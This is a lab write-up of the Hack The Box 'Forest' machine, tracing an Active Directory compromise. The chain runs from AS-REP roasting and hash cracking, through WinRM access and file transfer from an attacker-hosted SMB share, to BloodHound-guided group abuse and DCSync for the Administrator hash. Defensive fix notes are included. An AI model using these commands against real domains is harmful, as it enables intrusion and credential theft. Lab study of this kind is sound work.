Hack The Box Forest

System IP: 10.129.1.77 (Forest)
Service Enumeration
Server IP Address: 10.129.1.77
Ports Open
TCP: 53, 88, 135, 139, 389, 445, 464, 593, 636, 3268, 3269, 5985
UDP:
Nmap Scan Results:
Service Scan
sudo nmap -sS -sC -sV -O 10.129.1.77
Ports: 53, 88, 135, 139, 389, 445, 464, 593, 636, 3268, 3269
Scanning all ports: sudo nmap -p- -v 10.129.1.77
Initial Shell Vulnerability Exploited
AS-REP Roasting: accounts that do not require Kerberos pre-authentication.
Additional info about where the initial shell was acquired from
Vulnerability Explanation: No domain account is needed to perform this attack, only a connection to the KDC. With a domain account, however, an LDAP query can be used to list the users in the domain that do not require Kerberos pre-authentication. The script GetNPUsers.py can be run from a Linux machine to harvest the AS-REP responses for those accounts; when it finishes, it writes an output file with the encoded AS-REP messages, which can then be cracked offline with hashcat or John.
Vulnerability Fix: Enable Kerberos pre-authentication on the affected accounts (remove the "Do not require Kerberos preauthentication" setting); the PowerShell check is given in the fix section below.
Severity: Critical
Proof of Concept Code Here:
https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py
Privilege Escalation
Hack the Box Forest
After seeing SMB and LDAP in the scan results above, I tried using CrackMapExec to enumerate more about the server
Domain name: htb.local
SMB Version 1
sudo nmap -sT -Pn -n --open 10.129.1.77 --script ldap-rootdse
https://exploit.ph/active-directory-recon-1.html
I then used a Metasploit auxiliary scanner to enumerate users from the Active Directory server.
I could potentially use these usernames to conduct a brute-force, keeping the domain lockout policy in mind.
sudo enum4linux -a 10.129.1.77
New trick (most likely not allowed on a test): CrackMapExec allows password policy enumeration through "null" authentication. Very interesting.
After more googling I came across Impacket, which is already on my Kali box. Some of its scripts let you dump user hashes. I changed my /etc/hosts file to map 10.129.1.77 to htb.local.
I used the GetNPUsers.py script against the htb.local domain, for svc-alfresco first.
The hash came back in $krb5asrep$23 format (etype 23, RC4-HMAC). The article below led me to hashcat mode 18200 (-m 18200) to crack it.
https://stealthbits.com/blog/cracking-active-directory-passwords-with-as-rep-roasting/
Vulnerability Fix: Protect against AS-REP roasting by identifying accounts that do not require pre-authentication. To prevent this attack, find every user account that has the "Do not require Kerberos preauthentication" setting and remove it. You can find them with a simple command:
Powershell Command
Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name
Reference: https://stealthbits.com/blog/cracking-active-directory-passwords-with-as-rep-roasting/
Looking over the full nmap scan I see wsman (WinRM, port 5985) is open. I pulled down evil-winrm and used the svc-alfresco account with the cracked password (s3rvice) to WinRM into the machine.
Once on the box I needed a way to transfer files onto the DC. This is where I learned a new trick using Impacket's SMB server: host a share from Kali, then map it as a PSDrive from the WinRM session.
sudo impacket-smbserver LetsGo $(pwd) -smb2support -user hunter -password password
$pass = ConvertTo-SecureString 'password' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('hunter', $pass)
New-PSDrive -Name hunter -PSProvider FileSystem -Credential $cred -Root \\10.10.14.113\LetsGo
Once the new drive was mapped on the DC I ran winPEAS.exe to enumerate further, but nothing else of importance came out of it.
After lots of googling I decided to use BloodHound. I have used it plenty of times, so this part was easy to set up on Kali. You need SharpHound.exe to collect domain info as the service account svc-alfresco. Since I am authenticated to the DC I can transfer SharpHound.exe over and run it with the All collection method. The setup consists of the collector (SharpHound), BloodHound (the visualizer), and Neo4j as the database backbone.
Essentially, we need to get admin privileges. I can see that svc-alfresco is a member of a privileged accounts group, which is a member of Account Operators, and Account Operators has GenericAll over the Exchange Windows Permissions group. From the relationship breakdown visualized by BloodHound I now know I can create users and add them to the Exchange group.
After adding a user, I googled how to add users to other groups. I added my new user "hunter" to the "Exchange Windows Permissions" group.
Ran BloodHound again to see that hunter was added.
You can see that hunter is a part of the Exchange group. Very noisy.

BloodHound also highlights abuse info on the Exchange Windows Permissions group that leads to DCSync.
DcSync Exploit:

OpSec Consideration for mitigating threat


After downloading PowerSploit I copied PowerView.ps1 to the SMB directory I am currently hosting with impacket-smbserver.

Once you open another evil-winrm session to the DC, you can reconnect to your Kali box and use the hunter: drive.


Next, serve PowerView.ps1 with python3 -m http.server 80 so it can be downloaded.

The follow-on tasks were compiled from the GitBook link below along with the BloodHound abuse references.
https://burmat.gitbook.io/security/hacking/domain-exploitation
Execute the command below to transfer PowerView.ps1.

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
Now we want to set variables for hunter's credentials. These are used by the DCSync abuse command that BloodHound refers to.

secretsdump.py performs various techniques to dump hashes from the remote machine without executing any agent there.
https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py
Now we have the Administrator hash.


